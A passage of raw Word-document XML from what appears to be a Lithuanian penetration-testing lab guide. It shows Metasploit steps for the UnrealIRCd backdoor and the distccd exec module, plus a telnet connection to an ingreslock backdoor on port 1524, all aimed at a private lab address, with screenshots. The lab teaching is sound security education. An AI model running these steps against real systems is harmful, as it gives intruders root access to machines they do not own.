    <w:p w14:paraId="3D9A2EC7" w14:textId="49C7674A" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00B958F8"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6AFDC072"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5F014A3A"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4F898D47"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73664732" w14:textId="77777777" w:rsidTr="004C1EA1">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="23CCC595" w14:textId="51B5B2E5" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00F0282B" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F0282B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>msfconsole</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6497" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="01C4BBD3" w14:textId="44BD4B75" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00F0282B" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D04A505" wp14:editId="6BDBB1C2">
                  <wp:extent cx="3895694" cy="346623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4958" cy="3492276"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F0282B" w:rsidRPr="00607DC0" w14:paraId="1342D842" w14:textId="77777777" w:rsidTr="004C1EA1">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="160BC0EC" w14:textId="27E80301" w:rsidR="00F0282B" w:rsidRDefault="00F0282B" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F0282B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>use exploit/unix/irc/unreal_ircd_3281_backdoor</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17CE4BF8" w14:textId="0AC7F830" w:rsidR="00F0282B" w:rsidRDefault="00F0282B" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F0282B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>set RHOST 192.168.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>177</w:t>
            </w:r>
            <w:r w:rsidRPr="00F0282B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28B14DB0" w14:textId="1BFBE0A5" w:rsidR="00F0282B" w:rsidRPr="00607DC0" w:rsidRDefault="00F0282B" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F0282B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6497" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="34FE1A47" w14:textId="3B5C7432" w:rsidR="00F0282B"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64E27CFA" wp14:editId="5FE1625A">
                  <wp:extent cx="4124325" cy="2006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2006600"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B958F8" w:rsidRPr="00607DC0" w14:paraId="42D921F7" w14:textId="77777777" w:rsidTr="00F0282B">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="35C63630" w14:textId="68C732B9" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00C134B2" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6497" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1019A4EF" w14:textId="32F710AD" w:rsidR="00B958F8"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4B4787F7" wp14:editId="1237D906">
                  <wp:extent cx="2333625" cy="628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3625" cy="628650"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1EF8E2F7" w14:textId="77777777" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00B958F8" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="321DD5A7" w14:textId="77777777" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00B958F8" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="057C475B" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Naudoti telnet arba metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCA1699" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">root@linux:~# </w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D1A952" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2059A268" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Daug mažiau subtilus yra senas laukimo (standby) "ingreslock" Backdoor. Ji naudoja 1524 prieigą (port). Ingreslock prieiga buvo labai populiarus pasirinkimas kai prieš dešimtmetį Backdoor diegdavo į serverius. Ją gauti labai paprasta:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B82DAC" w14:textId="59A01C42" w:rsidR="00CC09C3" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E68F713" w14:textId="77777777" w:rsidR="00607DC0" w:rsidRPr="00607DC0" w:rsidRDefault="00607DC0" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61C15730" w14:textId="263B3F7F" w:rsidR="00607DC0" w:rsidRPr="00013966" w:rsidRDefault="00CC09C3" w:rsidP="00607DC0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc258656092"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Paslaugos:netyčiniai Backdoors</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="579A605D" w14:textId="77777777" w:rsidR="00607DC0" w:rsidRPr="00607DC0" w:rsidRDefault="00607DC0" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B84A729" w14:textId="4651C38A" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00B958F8"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2953"/>
        <w:gridCol w:w="6497"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B958F8" w:rsidRPr="00607DC0" w14:paraId="22A511CE" w14:textId="77777777" w:rsidTr="003C0B7F">
        <w:trPr>
          <w:trHeight w:val="368"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3B0DB739"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497" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="183ACBB1"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13573337" w14:textId="77777777" w:rsidTr="003C0B7F">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="31A8D0C5" w14:textId="3921873E" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00C134B2"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t>telnet 192.168.177.128 1524</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6497" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="345DF39A" w14:textId="3E5769D1" w:rsidR="00B958F8"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3A833F3B" wp14:editId="581D9F23">
                  <wp:extent cx="2476500" cy="8096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500" cy="809625"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B958F8" w:rsidRPr="00607DC0" w14:paraId="0086B746" w14:textId="77777777" w:rsidTr="003C0B7F">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="13547769" w14:textId="0EFAA707" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00C134B2"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t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6497" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2A75B3FD" w14:textId="6A75AF05" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00C134B2" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FC845AF" wp14:editId="01260F83">
                  <wp:extent cx="303847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342900"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4B319B0C" w14:textId="77777777" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00B958F8" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74270812" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="186D95E0" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Be žalingų Backdoors yra ir paslaugos kurie pagal savo prigimtį yra pažeidžiami. Pirmasis iš jų yra įdiegtas IP - </w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>distccd</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. Ši programa leidžia lengvai paskirstyti didelį kompiliatoriaus darbą įvairiose sistemos. Šios paslaugos problema yra ta, kad hakeris gali lengvai piktnaudžiauti ją, paleisti komandas su atitinkamais pasirinkimas (raktais).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1B7C2E" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C77C755" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">root@linux:~# </w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A26BA75" w14:textId="2BD8EA05" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ACBE547" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">msf &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>use exploit/unix/misc/distcc_exec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B27DFA2" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">msf  exploit(distcc_exec) &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>set RHOST IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C13833A" w14:textId="13B17847" w:rsidR="00607DC0" w:rsidRPr="00013966" w:rsidRDefault="00CC09C3" w:rsidP="00607DC0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">msf  exploit(distcc_exec) &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5528DF83" w14:textId="77777777" w:rsidR="00607DC0" w:rsidRPr="00607DC0" w:rsidRDefault="00607DC0" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B019BDD" w14:textId="77777777" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00B958F8" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>(galima pateikti darbalaukio atvaizdą)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3420"/>
        <w:gridCol w:w="6030"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B958F8" w:rsidRPr="00607DC0" w14:paraId="22BC8074" w14:textId="77777777" w:rsidTr="00C134B2">
        <w:trPr>
          <w:trHeight w:val="368"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3420" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="57C5269B"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030" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4166E06D" w14:textId="77777777" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00B958F8"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B958F8" w:rsidRPr="00607DC0" w14:paraId="399CE03C" w14:textId="77777777" w:rsidTr="00C134B2">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3420" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3498A73A" w14:textId="732C44CF" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00C134B2"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lastRenderedPageBreak/>
              <w:t>msfconsole</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6030" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5F5421AD" w14:textId="1C0EEA04" w:rsidR="00B958F8"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033464BD" wp14:editId="45E05333">
                  <wp:extent cx="3524652" cy="3152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4538" cy="3197397"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B958F8" w:rsidRPr="00607DC0" w14:paraId="61C1EB4A" w14:textId="77777777" w:rsidTr="005276E9">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3420" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="52533756" w14:textId="35BB22FA" w:rsidR="00C134B2" w:rsidRPr="00607DC0" w:rsidRDefault="00C134B2" w:rsidP="005276E9">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
